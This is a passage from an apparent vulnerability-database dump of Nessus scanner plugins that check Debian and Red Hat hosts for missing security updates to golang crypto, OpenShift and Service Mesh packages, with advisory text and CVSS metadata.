descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2402-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141271);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/12\");\n\n script_cve_id(\"CVE-2019-11840\", \"CVE-2019-11841\", \"CVE-2020-9283\");\n\n script_name(english:\"Debian DLA-2402-1 : golang-go.crypto security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"CVE-2019-11840\n\nAn issue was discovered in supplementary Go cryptography libraries,\naka golang-googlecode-go-crypto. If more than 256 GiB of keystream is\ngenerated, or if the counter otherwise grows greater than 32 bits, the\namd64 implementation will first generate incorrect output, and then\ncycle back to previously generated keystream. Repeated keystream bytes\ncan lead to loss of confidentiality in encryption applications, or to\npredictability in CSPRNG applications.\n\nCVE-2019-11841\n\nA message-forgery issue was discovered in\ncrypto/openpgp/clearsign/clearsign.go in supplementary Go cryptography\nlibraries. The 'Hash' Armor Header specifies the message digest\nalgorithm(s) used for the signature. Since the library skips Armor\nHeader parsing in general, an attacker can not only embed arbitrary\nArmor Headers, but also prepend arbitrary text to cleartext messages\nwithout invalidating the signatures.\n\nCVE-2020-9283\n\ngolang.org/x/crypto allows a panic during signature verification in\nthe golang.org/x/crypto/ssh package. A client can attack an SSH server\nthat accepts public keys. Also, a server can attack any SSH client.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1.\n\nWe recommend that you upgrade your golang-go.crypto packages.\n\nFor the detailed security status of golang-go.crypto please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/golang-go.crypto\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/golang-go.crypto\"\n );\n # https://security-tracker.debian.org/tracker/source-package/golang-go.crypto\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e94138e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11841\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-go.crypto-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:golang-golang-x-crypto-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"golang-go.crypto-dev\", reference:\"1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"golang-golang-x-crypto-dev\", reference:\"1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-23T15:00:01", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:2413 advisory.\n\n - kubernetes: credential leak in kube-controller-manager via error messages in mount failure logs and events for AzureFile and CephFS volumes (CVE-2019-11252)\n\n - kubernetes: Denial of service in API server via crafted YAML payloads by authorized users (CVE-2019-11254)\n\n - kubernetes: node localhost services reachable via martian packets (CVE-2020-8558)\n\n - proglottis/gpgme: Use-after-free in GPGME bindings during container image pull (CVE-2020-8945)\n\n - golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5 package (RHSA-2020:2413)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11252", "CVE-2019-11254", "CVE-2020-8558", "CVE-2020-8945", "CVE-2020-9283"], "modified": "2022-05-17T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube"], "id": "REDHAT-RHSA-2020-2413.NASL", "href": "https://www.tenable.com/plugins/nessus/138387", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2413. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138387);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/17\");\n\n script_cve_id(\"CVE-2019-11254\", \"CVE-2020-8558\", \"CVE-2020-8945\");\n script_xref(name:\"RHSA\", value:\"2020:2413\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5 package (RHSA-2020:2413)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2413 advisory.\n\n - kubernetes: credential leak in kube-controller-manager via error messages in mount failure logs and events\n for AzureFile and CephFS volumes (CVE-2019-11252)\n\n - kubernetes: Denial of service in API server via crafted YAML payloads by authorized users (CVE-2019-11254)\n\n - kubernetes: node localhost services reachable via martian packets (CVE-2020-8558)\n\n - proglottis/gpgme: Use-after-free in GPGME bindings during container image pull (CVE-2020-8945)\n\n - golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/130.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/209.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/300.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-11252\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-11254\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8558\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-9283\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2413\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1795838\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1804533\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1819486\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1843358\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1860158\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected machine-config-daemon and / or openshift-hyperkube packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8558\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(130, 209, 300, 400, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'openshift-hyperkube-4.5.0-202007012112.p0.git.0.582d7fc.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202007012112.p0.git.2527.d12c3da.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift', 'repo_list':['openshift_4_5_el8']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'machine-config-daemon / openshift-hyperkube');\n}\n", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-25T18:11:59", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:3369 advisory.\n\n - jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)\n\n - macaron: open redirect in the static handler (CVE-2020-12666)\n\n - golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\n - golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.4, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2020-08-07T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : Red Hat OpenShift Service Mesh (RHSA-2020:3369)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11023", "CVE-2020-12666", "CVE-2020-14040", "CVE-2020-8203", "CVE-2020-9283"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:kiali", "p-cpe:/a:redhat:enterprise_linux:servicemesh", "p-cpe:/a:redhat:enterprise_linux:servicemesh-citadel", "p-cpe:/a:redhat:enterprise_linux:servicemesh-galley", "p-cpe:/a:redhat:enterprise_linux:servicemesh-grafana", "p-cpe:/a:redhat:enterprise_linux:servicemesh-grafana-prometheus", "p-cpe:/a:redhat:enterprise_linux:servicemesh-istioctl", "p-cpe:/a:redhat:enterprise_linux:servicemesh-mixc", "p-cpe:/a:redhat:enterprise_linux:servicemesh-mixs", "p-cpe:/a:redhat:enterprise_linux:servicemesh-operator", "p-cpe:/a:redhat:enterprise_linux:servicemesh-pilot-agent", "p-cpe:/a:redhat:enterprise_linux:servicemesh-pilot-discovery", "p-cpe:/a:redhat:enterprise_linux:servicemesh-prometheus", "p-cpe:/a:redhat:enterprise_linux:servicemesh-sidecar-injector"], "id": "REDHAT-RHSA-2020-3369.NASL", "href": "https://www.tenable.com/plugins/nessus/139385", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:3369. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139385);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2020-8203\",\n \"CVE-2020-9283\",\n \"CVE-2020-11023\",\n \"CVE-2020-12666\",\n \"CVE-2020-14040\"\n );\n script_xref(name:\"RHSA\", value:\"2020:3369\");\n script_xref(name:\"IAVA\", value:\"2021-A-0347\");\n script_xref(name:\"IAVB\", value:\"2020-B-0030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0194-S\");\n\n script_name(english:\"RHEL 7 / 8 : Red Hat OpenShift Service Mesh (RHSA-2020:3369)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:3369 advisory.\n\n - jquery: Passing HTML containing elements to manipulation methods could result in untrusted code\n execution (CVE-2020-11023)\n\n - macaron: open redirect in the static handler (CVE-2020-12666)\n\n - golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n (CVE-2020-14040)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\n - golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/130.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/601.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/835.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8203\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-9283\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14040\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:3369\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1804533\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1850004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1850034\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857412\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 79, 130, 601, 835);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kiali\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-citadel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-galley\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-grafana\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-grafana-prometheus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-istioctl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-mixc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-mixs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-operator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-pilot-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-pilot-discovery\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-prometheus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:servicemesh-sidecar-injector\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'service_mesh_1_1_el7': [\n 'rhel-7-server-ossm-1.1-rpms',\n 'rhel-7-server-ossm-1.1-source-rpms'\n ],\n 'service_mesh_1_1_el8': [\n 'ossm-1.1-for-rhel-8-s390x-rpms',\n 'ossm-1.1-for-rhel-8-s390x-source-rpms',\n 'ossm-1.1-for-rhel-8-x86_64-rpms',\n 'ossm-1.1-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'kiali-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el7', 'service_mesh_1_1_el8']},\n {'reference':'servicemesh-citadel-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-galley-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-grafana-6.4.3-13.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-grafana-prometheus-6.4.3-13.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-istioctl-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-mixc-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-mixs-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-operator-1.1.6-2.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-pilot-agent-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-pilot-discovery-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n 